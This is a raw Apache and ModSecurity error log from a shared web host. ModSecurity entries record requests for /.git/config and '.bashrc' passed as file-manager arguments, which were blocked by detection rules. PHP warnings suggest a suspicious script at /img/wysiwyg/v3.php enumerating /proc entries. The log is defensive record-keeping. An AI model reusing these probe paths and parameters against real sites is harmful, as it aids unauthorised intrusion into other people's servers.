[Mon May 11 23:36:23.658763 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:24.206743 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:24.753966 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:33.961414 2026] [security2:error] [pid 1588898:tid 1588921] [client 43.134.111.142:38968] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/xmlrpc.php"] [unique_id "agJL4aFW67LJTsgN3jQkzQAAABc"]
[Mon May 11 23:36:35.258817 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:35.916858 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:36.463631 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:40.126575 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:40.646803 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:42.819110 2026] [proxy_fcgi:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01071: Got error 'Primary script unknown'
[Mon May 11 23:36:57.333614 2026] [autoindex:error] [pid 1630927:tid 1630954] [client 172.190.142.176:17291] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:37:04.332030 2026] [security2:error] [pid 1588898:tid 1589210] [client 172.94.9.253:43012] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "culturesvoile.com"] [uri "/.git/config"] [unique_id "agJMAKFW67LJTsgN3jQlBQAAABU"]
[Mon May 11 23:37:04.332259 2026] [security2:error] [pid 1588898:tid 1589210] [client 172.94.9.253:43012] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "culturesvoile.com"] [uri "/.git/config"] [unique_id "agJMAKFW67LJTsgN3jQlBQAAABU"]
[Mon May 11 23:37:04.332517 2026] [security2:error] [pid 1588898:tid 1589210] [client 172.94.9.253:43012] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "culturesvoile.com"] [uri "/.git/config"] [unique_id "agJMAKFW67LJTsgN3jQlBQAAABU"]
[Mon May 11 23:37:11.151574 2026] [autoindex:error] [pid 1605480:tid 1605527] [client 172.190.142.176:24373] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:37:11.706011 2026] [autoindex:error] [pid 1630927:tid 1630954] [client 172.190.142.176:17291] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:37:24.904511 2026] [:error] [pid 1601130:tid 1601164] [client 85.208.96.208:42086] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 23:37:32.688442 2026] [autoindex:error] [pid 1606352:tid 1606422] [client 34.242.6.163:60186] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:37:36.127559 2026] [security2:error] [pid 1588898:tid 1588911] [client 49.51.38.193:48508] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "manhattan-studio.fr"] [uri "/"] [unique_id "agJMIKFW67LJTsgN3jQlLwAAAAw"], referer: http://manhattan-studio.fr
[Mon May 11 23:37:39.891251 2026] [authz_core:error] [pid 1605480:tid 1605522] [client 52.140.115.251:56912] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/rest-api/error_log
[Mon May 11 23:37:42.403784 2026] [security2:error] [pid 1601130:tid 1601162] [client 43.135.183.82:43546] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/bender/"] [unique_id "agJMJnEgAO_835W6c1mvpgAAAEw"]
[Mon May 11 23:38:06.952466 2026] [security2:error] [pid 1601130:tid 1601170] [client 49.51.195.195:48318] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/informatique/realisations/gpt-4o-fait-des-progres-pas-comme-sheila/"] [unique_id "agJMPnEgAO_835W6c1mvugAAAFQ"]
[Mon May 11 23:38:22.682280 2026] [security2:error] [pid 1630927:tid 1630952] [client 43.165.167.69:52168] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/user/passwordforgotten.php"] [unique_id "agJMTmiGYYhUwDaJINmmCgAAAVY"]
[Mon May 11 23:39:17.790029 2026] [security2:error] [pid 1605480:tid 1605531] [client 43.157.170.126:36384] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJMhR2Cvzd_nyNfUm8YdwAAAQk"]
[Mon May 11 23:39:35.252279 2026] [security2:error] [pid 1601130:tid 1601151] [client 119.28.100.145:34780] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agJMl3EgAO_835W6c1mwEQAAAEE"]
[Mon May 11 23:40:15.598905 2026] [security2:error] [pid 1590352:tid 1590401] [client 43.162.109.249:41070] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/Darwich-extrait-3.mp3"] [unique_id "agJMv61q0G_aXAqWauQTxQAAAIk"]
[Mon May 11 23:40:34.860732 2026] [security2:error] [pid 1588898:tid 1588900] [client 43.156.232.134:34986] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/friandise/"] [unique_id "agJM0qFW67LJTsgN3jQmOQAAAAA"]
[Mon May 11 23:40:41.900208 2026] [security2:error] [pid 1601130:tid 1601154] [client 43.166.247.155:33806] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJM2XEgAO_835W6c1mweAAAAEQ"]
[Mon May 11 23:40:44.439461 2026] [security2:error] [pid 1601130:tid 1601158] [client 43.156.71.177:52308] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/downloads/Composition_Orgue-Cheron.pdf"] [unique_id "agJM3HEgAO_835W6c1mwegAAAEg"]
[Mon May 11 23:40:54.037515 2026] [security2:error] [pid 1605480:tid 1605541] [client 43.135.135.57:58786] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJM5h2Cvzd_nyNfUm8Y2AAAARM"]
[Mon May 11 23:40:55.654933 2026] [security2:error] [pid 1601130:tid 1601155] [client 162.62.231.139:58328] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJM53EgAO_835W6c1mwhwAAAEU"]
[Mon May 11 23:41:27.254884 2026] [security2:error] [pid 1590352:tid 1590413] [client 129.226.83.4:54714] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "naturedetres.fr"] [uri "/"] [unique_id "agJNB61q0G_aXAqWauQUPAAAAJU"]
[Mon May 11 23:41:34.917311 2026] [security2:error] [pid 1588898:tid 1588911] [client 216.73.216.110:45125] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:rename. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bashrc found within ARGS:rename: .bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agJNDqFW67LJTsgN3jQmeAAAAAw"]
[Mon May 11 23:41:34.918416 2026] [security2:error] [pid 1588898:tid 1588911] [client 216.73.216.110:45125] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agJNDqFW67LJTsgN3jQmeAAAAAw"]
[Mon May 11 23:41:35.011282 2026] [security2:error] [pid 1588898:tid 1588911] [client 216.73.216.110:45125] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJNDqFW67LJTsgN3jQmeAAAAAw"]
[Mon May 11 23:41:53.694474 2026] [security2:error] [pid 1605480:tid 1605540] [client 216.73.216.110:9663] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:rights. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bashrc found within ARGS:rights: .bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agJNIR2Cvzd_nyNfUm8ZNAAAARI"]
[Mon May 11 23:41:53.700458 2026] [security2:error] [pid 1605480:tid 1605540] [client 216.73.216.110:9663] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agJNIR2Cvzd_nyNfUm8ZNAAAARI"]
[Mon May 11 23:41:53.842617 2026] [security2:error] [pid 1605480:tid 1605540] [client 216.73.216.110:9663] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJNIR2Cvzd_nyNfUm8ZNAAAARI"]
PHP Warning:  filesize(): stat failed for /proc/224/task/224/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/task/224/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/224/task/224/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/task/224/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/224/task/224/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/task/224/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 23:43:54.592618 2026] [core:error] [pid 1605480:tid 1605532] [client 91.224.92.99:55205] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:54.592811 2026] [core:error] [pid 1605480:tid 1605532] [client 91.224.92.99:55205] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:54.738977 2026] [core:error] [pid 1601130:tid 1601157] [client 91.224.92.99:58023] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:54.739010 2026] [core:error] [pid 1601130:tid 1601157] [client 91.224.92.99:58023] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:54.920230 2026] [core:error] [pid 1630927:tid 1630932] [client 91.224.92.99:58625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:54.920271 2026] [core:error] [pid 1630927:tid 1630932] [client 91.224.92.99:58625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.086613 2026] [core:error] [pid 1606352:tid 1606427] [client 91.224.92.99:51837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.086643 2026] [core:error] [pid 1606352:tid 1606427] [client 91.224.92.99:51837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.262633 2026] [core:error] [pid 1605480:tid 1605546] [client 91.224.92.99:62536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.262660 2026] [core:error] [pid 1605480:tid 1605546] [client 91.224.92.99:62536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.426796 2026] [core:error] [pid 1630927:tid 1630948] [client 91.224.92.99:64981] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.426823 2026] [core:error] [pid 1630927:tid 1630948] [client 91.224.92.99:64981] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.627684 2026] [core:error] [pid 1590352:tid 1590396] [client 91.224.92.99:65023] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
